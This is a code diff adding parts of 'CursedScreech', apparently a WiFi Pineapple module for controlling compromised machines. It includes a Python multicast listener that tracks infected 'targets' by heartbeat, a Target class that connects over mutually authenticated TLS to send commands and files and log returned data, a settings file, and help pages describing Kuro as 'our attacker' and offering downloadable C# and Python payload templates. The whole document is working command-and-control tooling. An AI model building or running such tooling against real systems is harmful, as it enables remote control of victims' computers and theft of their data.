+        with open(activity_log, "a") as log:
+                log.write(msg + "\n")
+
+def writeTargets(targets):
+	with open(target_list, 'w') as tlog:
+		for target in targets:
+			tlog.write(target.sockName() + "\n")
+
+# Set up the receiver socket to listen for multicast messages
+sck = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+sck.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+sck.bind((MCAST_GROUP, MCAST_PORT))
+sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE))
+
+# Import targets from file if any exist
+targets = []
+with open(target_list, 'r') as tList:
+	for line in tList:
+		targets.append(Target(line.split(":")[0], line.split(":")[1]))
+	
+def checkMissingTargets():
+	while True:
+		# Check if any targets are missing.  If they are remove them
+		# from the target_list and writeTargets().
+		# 'Missing' is indicated by not receiving a heartbeat from a target
+		# within thrice the set heartbeat interval.
+		global targets
+		global hbInterval
+		updateTargetList = False
+		for t in targets:
+			if t.isMissing(hbInterval * 3):
+				targets.remove(t)
+				updateTargetList = True
+		
+		if updateTargetList:
+			writeTargets(targets)
+			
+# Set up a separate thread to constantly check if targets
+# have missed multiple heartbeats.
+threads = []
+newThread = threading.Thread(target=checkMissingTargets)
+threads.append(newThread)
+newThread.start()
+
+while True:
+	print "Waiting for heartbeat..."
+	try:
+		msg = sck.recv(10240)
+		ip = msg.split(":")[0]
+		port = msg.split(":")[1]
+
+		print "Received: " + msg
+
+		# The heartbeat is sometimes used to send a message telling us
+		# when an invalid cert was sent to the target. This can be a sign
+		# of an attacker on the network attempting to access the shell
+		# we worked so hard to get on the target's system.
+		# We check for messages here and direct them to the proper log.
+		# For brevity's sake ip will let us know if it's a message and
+		# port will contain the contents of the message.
+		if ip == "msg":
+			logActivity("Multicast Message: " + port)
+			continue
+
+		# Check if the target currently exists in the target list
+		# if not then append it and write the list back out to
+		# target_list
+		if targetExists(ip, targets):
+			for i,t in enumerate(targets):
+				if ip == t.addr:
+					t.setPort(port)
+					t.lastSeen = time.time()
+					writeTargets(targets)
+		else:
+			targets.append(Target(ip, port))
+			writeTargets(targets)
+
+	except KeyboardInterrupt:
+		sys.exit()

modules/src/CursedScreech/includes/forest/settings

@@ -0,0 +1,13 @@
+kuro_key=
+target_key=
+client_serial=File does not exist
+iface_name=wlan2
+iface_ip=192.168.0.138
+mcast_group=231.253.78.29
+mcast_port=19578
+target_list=/pineapple/modules/CursedScreech/includes/forest/targets.log
+activity_log=/pineapple/modules/CursedScreech/includes/forest/activity.log
+cmd_list=/pineapple/modules/CursedScreech/includes/forest/cmd.log
+hb_interval=5
+kuro_serial=File does not exist
+auth=1

modules/src/CursedScreech/includes/forest/target.py

@@ -0,0 +1,126 @@
+from ssl import *
+from socket import *
+import time
+import os
+
+# Pull settings from file
+settingsFile = "/pineapple/modules/CursedScreech/includes/forest/settings"
+targetLogLocation = "/pineapple/modules/CursedScreech/includes/forest/targetlogs/"
+activity_log = priv_key = pub_cer = client_key = client_serial = ""
+settings = {}
+with open(settingsFile, "r") as sFile:
+	for line in sFile:
+		params = line.strip("\n").split("=")
+		if params[0] == "activity_log":
+			activity_log = params[1]
+		elif params[0] == "kuro_key":
+			priv_key = params[1] + ".key"
+			pub_cer = params[1] + ".cer"
+		elif params[0] == "target_key":
+			client_key = params[1] + ".cer"
+		elif params[0] == "client_serial":
+			client_serial = params[1]
+		else:
+			pass
+
+def logActivity(msg):
+	with open(activity_log, "a") as log:
+		log.write(msg + "\n")
+		
+def logReceivedData(data, file):
+	with open(targetLogLocation + file, "a+") as tLog:
+		tLog.write(data + "\n")
+
+class Target:
+	def __init__(self,addr=None,port=None):
+		self.addr = addr
+		self.port = int(port)
+		self.socket = None
+		self.msg = ""
+		self.recvData = ""
+		self.connected = False
+		self.lastSeen = time.time()
+
+	def secureConnect(self):
+		print "[>] Connecting to " + self.sockName()
+		logActivity("[>] Connecting to " + self.sockName())
+
+		try:
+			sck = socket(AF_INET, SOCK_STREAM)
+			self.socket = wrap_socket(sck, ssl_version=PROTOCOL_SSLv23, keyfile=priv_key, certfile=pub_cer, cert_reqs=CERT_REQUIRED, ca_certs=client_key)
+			self.socket.settimeout(10)
+			self.socket.connect((self.addr,self.port))
+			self.socket.settimeout(None)
+		
+			# Fetch the target's certificate to verify their identity
+			cert = self.socket.getpeercert()
+			if not cert['serialNumber'] == client_serial:
+				logActivity("[-] Certificate serial number doesn't match.")
+				self.disconnect()
+			else:
+				print "[+] Connected to " + self.sockName() + " via " + self.socket.version()
+				logActivity("[+] Connected to " + self.sockName() + " via " + self.socket.version())
+				self.connected = True
+				
+		except error as sockerror:
+			logActivity("[!] Failed to connect to " + self.sockName())
+			self.connected = False
+
+	def send(self, data):
+		if self.isConnected():
+		
+			if "sendfile;" in data:
+				dataParts = data.split(";")
+				filePath = dataParts[1]
+				storeDir = dataParts[2]
+				self.socket.sendall("sendfile;" + os.path.basename(filePath) + ";" + str(os.path.getsize(filePath)) + ";" + storeDir)
+				with open(filePath, "rb") as f:
+					self.socket.sendall(f.read())
+					logActivity("[!] File sent to " + self.sockName())
+			else:
+				self.socket.sendall(data.encode())
+				logActivity("[!] Command sent to " + self.sockName())
+				logReceivedData(data, self.addr)
+			
+		
+	def recv(self):
+		try:
+			d = self.socket.recv(4096)
+			self.recvData = d.decode()
+		
+			if not self.recvData:
+				self.disconnect()
+				return
+			
+			logReceivedData(self.recvData, self.addr)
+			logActivity("[+] Data received from: " + self.sockName())
+		
+		except KeyboardInterrupt:
+			return
+				
+		except:
+			self.disconnect()
+			
+	def isConnected(self):
+		return self.connected
+	
+	def sockName(self):
+		return self.addr + ":" + str(self.port)
+	
+	def disconnect(self):
+		logActivity("[!] Closing connection to " + self.sockName())
+		try:
+			self.socket.shutdown(SHUT_RDWR)
+		except:
+			pass
+		self.socket.close()
+		self.connected = False
+		
+	def setPort(self, port):
+		self.port = int(port)
+		
+	def isMissing(self, limit):
+		if time.time() - self.lastSeen > limit:
+			return True
+		else:
+			return False

modules/src/CursedScreech/includes/help/activitylog.help

@@ -0,0 +1,8 @@
+This log contains the output of Kuro.  It will inform you when a connection is initiated, when 
+a connection has been established with a target, the set TLS level with the target, when a command 
+has been sent to a target, when data is received from a target, and when targets are disconnected.
+<br /><br />
+Sometimes, Sein will interject and add a message to the log.  This only occurs when a target has 
+received a connection request from an attacker holding a key different from Kuro's.  A message is 
+sent to the multicast group, Sein receives it, and posts it in the activity log.  This informs you 
+that someone other than yourself is trying to access the shell on your target.

modules/src/CursedScreech/includes/help/key.help

@@ -0,0 +1,11 @@
+<strong>Encrypted</strong><br />
+Displays if the private key (.pem) is encrypted.  Does not include encryption on .pfx containers.
+<br /><br />
+
+<strong>Select</strong><br />
+When you click Select the associated key will be used.  Both the private and public key will be used for Kuro.py and only the public key will be used for the target.  This is so each program can verify the other when communicating over the network.
+<br /><br />
+<font color="red">
+Do not select encrypted keys for Kuro.  You will not be able to start the process if encrypted keys are used.  You may select encrypted keys for the target if you are using C# to write your payload.
+</font>
+

modules/src/CursedScreech/includes/help/settings.help

@@ -0,0 +1,39 @@
+<h4>Listening Interface</h4>
+This is the interface that will be used for the multicast socket.  br-lan is the Pineapple 
+network and is what you will use if your targets are connecting to your Pineapple directly.
+<br /><br />
+
+<h4>Multicast Group</h4>
+This is the address on which target heartbeats will be sent and received.  The group needs to be 
+the same for both Sein and your targets in order for Sein to receive the messages.
+<br /><br />
+
+<h4>Multicast Port</h4>
+This is the port on which Sein will receive messages from targets.  This same port needs to be 
+reflected in the startMulticaster() method of your payload.
+<br /><br />
+
+<h4>Heartbeat Interval</h4>
+The interval at which the payload will broadcast its listening address to Sein.  Sein uses this 
+value, multiplied by 3, to determine if a target has dropped off the network (i.e. three heartbeats 
+have been missed, therefore, the target must be offline).
+<br /><br />
+
+<h4>Kuro Keys</h4>
+The set of keys that Kuro will use for TLS communication.  Your payload will verify Kuro's public 
+certificate if you use the API (which you should).
+<br /><br />
+
+<h4>Target Keys</h4>
+The set of keys used by the payload for TLS communication.  Kuro will verify the target's public 
+certificate upon connection.
+<br /><br />
+
+<h4>C# Payload</h4>
+Downloads an archive containing the C# API, documentation, and a template C# payload configured 
+with the settings used here.
+<br /><br />
+
+<h4>Python Payload</h4>
+Downloads an archive containing the Python API, documentation, and a template Python payload 
+configured with the settings used here.

modules/src/CursedScreech/includes/help/status.help

@@ -0,0 +1,14 @@
+<h4>Sein</h4>
+Sein is our information gatherer.  It listens on the multicast group and port in Settings and 
+updates our target list when a compromised system is found.
+<br /><br />
+
+<h4>Kuro</h4>
+Kuro is our attacker that sends out commands to the clients you select.  At startup it attempts to 
+connect to all clients in the list.  If Sein finds new targets while Kuro is running, connections to 
+them will be attempted automatically.  Commands are sent asynchronously and returned data is received 
+in the same manner.
+<br /><br />
+
+<h4>Dependencies</h4>
+The only dependency required is zip for downloading payloads and target logs.

modules/src/CursedScreech/includes/help/targets.help

@@ -0,0 +1,30 @@
+<h4>EZ Cmds (select)</h4>
+Pre-configured commands that can be sent to targets.
+<br /><br />
+
+<h4>EZ Cmds (button)</h4>
+Open the EZ Cmds manager where you can add, edit, or delete EZ Cmds that appear in the list.
+<br /><br />
+
+<h4>Send command to target</h4>
+Manually enter a command to send to targets.
+<br /><br />
+
+<h4>Target List</h4>
+Displays the targets that are currently sending heartbeats to Sein.  You can view, download, 
+and clear received data.
+<br /><br />
+
+<h4>Clear Targets</h4>
+Clears the target list.  If targets are still online and sending heartbeats to Sein they will 
+reappear in the list.
+<br /><br />
+
+<h4>All Logs</h4>
+View, download, and delete logs from all clients, even those who were once connected but no longer 
+show up in the target list.
+<br /><br />
+
+<h4>Payloads</h4>
+Manage payloads that can be sent to targets.  Use the 'Configure Upload Limit' link if your payload fails to upload
+due to size restrictions.